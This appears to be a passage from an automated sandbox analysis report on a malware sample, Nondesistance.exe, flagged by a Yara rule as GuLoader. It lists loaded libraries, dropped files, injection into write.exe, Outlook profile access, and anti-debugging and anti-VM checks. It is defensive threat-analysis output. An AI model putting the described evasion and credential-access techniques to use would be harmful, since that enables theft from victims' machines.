        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: betnksomme.lnk.4.drLNK file: ..\AppData\Roaming\immoralizing.tar
        Source: C:\Users\user\Desktop\Nondesistance.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
        Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Nondesistance.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: write.pdbGCTL source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: write.pdb source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033001346.0000000000C3E000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: wntdll.pdbUGP source: Nondesistance.exe, 00000009.00000003.20300365198.000000003216B000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20303958082.0000000032316000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004B7D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20394487085.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20391249832.00000000046FE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004A50000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Nondesistance.exe, Nondesistance.exe, 00000009.00000003.20300365198.000000003216B000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20303958082.0000000032316000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004B7D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20394487085.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20391249832.00000000046FE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004A50000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000004.00000002.20222463111.00000000050BE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,4_2_10001A5D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_10002D20 push eax; ret 4_2_10002D4E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324CE060 push eax; retf 0008h9_2_324CE06D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324CE074 pushfd ; retf 9_2_324CE075
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324C21AD pushad ; retf 0004h9_2_324C223F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324C97A1 push es; iretd 9_2_324C97A8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F08CD push ecx; mov dword ptr [esp], ecx9_2_324F08D6
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_006168F3 push ds; iretd 10_2_006168F5
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_00614159 push es; ret 10_2_006141DB
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_00620930 push ebx; ret 10_2_0062096A
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_006141B0 push es; ret 10_2_006141DB
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_00611A4C push ebx; ret 10_2_00611A55
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_00603BF6 push cs; retf 10_2_00603C79
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_0060A430 push esi; retf 10_2_0060A43B
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_0061CCEC push ebx; retf 10_2_0061CD0B
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_0061CCF0 push ebx; retf 10_2_0061CD0B
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_00618D0C push ebx; iretd 10_2_00618D0D
        Source: C:\Users\user\Desktop\Nondesistance.exeFile created: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Nondesistance.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 rdtsc 9_2_32531763
        Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 9713Jump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Nondesistance.exeAPI coverage: 0.2 %
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220Thread sleep time: -115000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220Thread sleep count: 44 > 30Jump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220Thread sleep time: -66000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220Thread sleep count: 62 > 30Jump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220Thread sleep time: -62000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\write.exe TID: 4792Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\write.exe TID: 4792Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\write.exe TID: 4792Thread sleep count: 9713 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\write.exe TID: 4792Thread sleep time: -19426000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_00406033 FindFirstFileA,FindClose,4_2_00406033
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004055D1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_00402688 FindFirstFileA,4_2_00402688
        Source: Nondesistance.exe, 00000009.00000003.20300938788.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25031337146.000000000078F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
        Source: write.exe, 0000000B.00000002.25030469735.0000000002DD4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.20675207011.000002D946E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\Nondesistance.exeAPI call chain: ExitProcess graph end nodegraph_4-4021
        Source: C:\Users\user\Desktop\Nondesistance.exeAPI call chain: ExitProcess graph end nodegraph_4-4185
        Source: C:\Windows\SysWOW64\write.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 rdtsc 9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_00403A41 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongA,GetDlgItem,SendMessageA,IsWindowEnabled,SendMessageA,GetDlgItem,LdrInitializeThunk,GetDlgItem,GetDlgItem,SetClassLongA,LdrInitializeThunk,SendMessageA,LdrInitializeThunk,LdrInitializeThunk,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,LdrInitializeThunk,GetSystemMenu,EnableMenuItem,SendMessageA,LdrInitializeThunk,SendMessageA,SendMessageA,lstrlenA,SetWindowTextA,DestroyWindow,CreateDialogParamA,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,4_2_00403A41
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,4_2_10001A5D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F24A mov eax, dword ptr fs:[00000030h]9_2_3251F24A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF247 mov eax, dword ptr fs:[00000030h]9_2_325AF247
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3258327E mov eax, dword ptr fs:[00000030h]9_2_3258327E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3258327E mov eax, dword ptr fs:[00000030h]9_2_3258327E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3258327E mov eax, dword ptr fs:[00000030h]9_2_3258327E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3258327E mov eax, dword ptr fs:[00000030h]9_2_3258327E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3258327E mov eax, dword ptr fs:[00000030h]9_2_3258327E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3258327E mov eax, dword ptr fs:[00000030h]9_2_3258327E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AD270 mov eax, dword ptr fs:[00000030h]9_2_325AD270
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB273 mov eax, dword ptr fs:[00000030h]9_2_324EB273
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB273 mov eax, dword ptr fs:[00000030h]9_2_324EB273
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB273 mov eax, dword ptr fs:[00000030h]9_2_324EB273
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257B214 mov eax, dword ptr fs:[00000030h]9_2_3257B214
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257B214 mov eax, dword ptr fs:[00000030h]9_2_3257B214
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EA200 mov eax, dword ptr fs:[00000030h]9_2_324EA200
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E821B mov eax, dword ptr fs:[00000030h]9_2_324E821B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32510230 mov ecx, dword ptr fs:[00000030h]9_2_32510230
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32570227 mov eax, dword ptr fs:[00000030h]9_2_32570227
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32570227 mov eax, dword ptr fs:[00000030h]9_2_32570227
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32570227 mov eax, dword ptr fs:[00000030h]9_2_32570227
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252A22B mov eax, dword ptr fs:[00000030h]9_2_3252A22B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252A22B mov eax, dword ptr fs:[00000030h]9_2_3252A22B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252A22B mov eax, dword ptr fs:[00000030h]9_2_3252A22B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325132C5 mov eax, dword ptr fs:[00000030h]9_2_325132C5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C32C9 mov eax, dword ptr fs:[00000030h]9_2_325C32C9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324ED2EC mov eax, dword ptr fs:[00000030h]9_2_324ED2EC
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324ED2EC mov eax, dword ptr fs:[00000030h]9_2_324ED2EC
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325002F9 mov eax, dword ptr fs:[00000030h]9_2_325002F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325002F9 mov eax, dword ptr fs:[00000030h]9_2_325002F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325002F9 mov eax, dword ptr fs:[00000030h]9_2_325002F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325002F9 mov eax, dword ptr fs:[00000030h]9_2_325002F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325002F9 mov eax, dword ptr fs:[00000030h]9_2_325002F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325002F9 mov eax, dword ptr fs:[00000030h]9_2_325002F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325002F9 mov eax, dword ptr fs:[00000030h]9_2_325002F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325002F9 mov eax, dword ptr fs:[00000030h]9_2_325002F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E72E0 mov eax, dword ptr fs:[00000030h]9_2_324E72E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA2E0 mov eax, dword ptr fs:[00000030h]9_2_324FA2E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA2E0 mov eax, dword ptr fs:[00000030h]9_2_324FA2E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA2E0 mov eax, dword ptr fs:[00000030h]9_2_324FA2E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA2E0 mov eax, dword ptr fs:[00000030h]9_2_324FA2E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA2E0 mov eax, dword ptr fs:[00000030h]9_2_324FA2E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA2E0 mov eax, dword ptr fs:[00000030h]9_2_324FA2E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F82E0 mov eax, dword ptr fs:[00000030h]9_2_324F82E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F82E0 mov eax, dword ptr fs:[00000030h]9_2_324F82E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F82E0 mov eax, dword ptr fs:[00000030h]9_2_324F82E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F82E0 mov eax, dword ptr fs:[00000030h]9_2_324F82E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E289 mov eax, dword ptr fs:[00000030h]9_2_3256E289
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F7290 mov eax, dword ptr fs:[00000030h]9_2_324F7290
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F7290 mov eax, dword ptr fs:[00000030h]9_2_324F7290
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F7290 mov eax, dword ptr fs:[00000030h]9_2_324F7290
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325CB2BC mov eax, dword ptr fs:[00000030h]9_2_325CB2BC
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325CB2BC mov eax, dword ptr fs:[00000030h]9_2_325CB2BC
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325CB2BC mov eax, dword ptr fs:[00000030h]9_2_325CB2BC
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325CB2BC mov eax, dword ptr fs:[00000030h]9_2_325CB2BC
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E92AF mov eax, dword ptr fs:[00000030h]9_2_324E92AF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B92AB mov eax, dword ptr fs:[00000030h]9_2_325B92AB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF2AE mov eax, dword ptr fs:[00000030h]9_2_325AF2AE
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325142AF mov eax, dword ptr fs:[00000030h]9_2_325142AF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325142AF mov eax, dword ptr fs:[00000030h]9_2_325142AF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EC2B0 mov ecx, dword ptr fs:[00000030h]9_2_324EC2B0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252A350 mov eax, dword ptr fs:[00000030h]9_2_3252A350
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E8347 mov eax, dword ptr fs:[00000030h]9_2_324E8347
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E8347 mov eax, dword ptr fs:[00000030h]9_2_324E8347
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E8347 mov eax, dword ptr fs:[00000030h]9_2_324E8347
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E372 mov eax, dword ptr fs:[00000030h]9_2_3256E372
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E372 mov eax, dword ptr fs:[00000030h]9_2_3256E372
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E372 mov eax, dword ptr fs:[00000030h]9_2_3256E372
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E372 mov eax, dword ptr fs:[00000030h]9_2_3256E372
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32570371 mov eax, dword ptr fs:[00000030h]9_2_32570371
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32570371 mov eax, dword ptr fs:[00000030h]9_2_32570371
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251237A mov eax, dword ptr fs:[00000030h]9_2_3251237A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FB360 mov eax, dword ptr fs:[00000030h]9_2_324FB360
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FB360 mov eax, dword ptr fs:[00000030h]9_2_324FB360
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FB360 mov eax, dword ptr fs:[00000030h]9_2_324FB360
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FB360 mov eax, dword ptr fs:[00000030h]9_2_324FB360
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FB360 mov eax, dword ptr fs:[00000030h]9_2_324FB360
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FB360 mov eax, dword ptr fs:[00000030h]9_2_324FB360
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E363 mov eax, dword ptr fs:[00000030h]9_2_3252E363
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E363 mov eax, dword ptr fs:[00000030h]9_2_3252E363
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E363 mov eax, dword ptr fs:[00000030h]9_2_3252E363
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E363 mov eax, dword ptr fs:[00000030h]9_2_3252E363
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E363 mov eax, dword ptr fs:[00000030h]9_2_3252E363
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E363 mov eax, dword ptr fs:[00000030h]9_2_3252E363
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E363 mov eax, dword ptr fs:[00000030h]9_2_3252E363
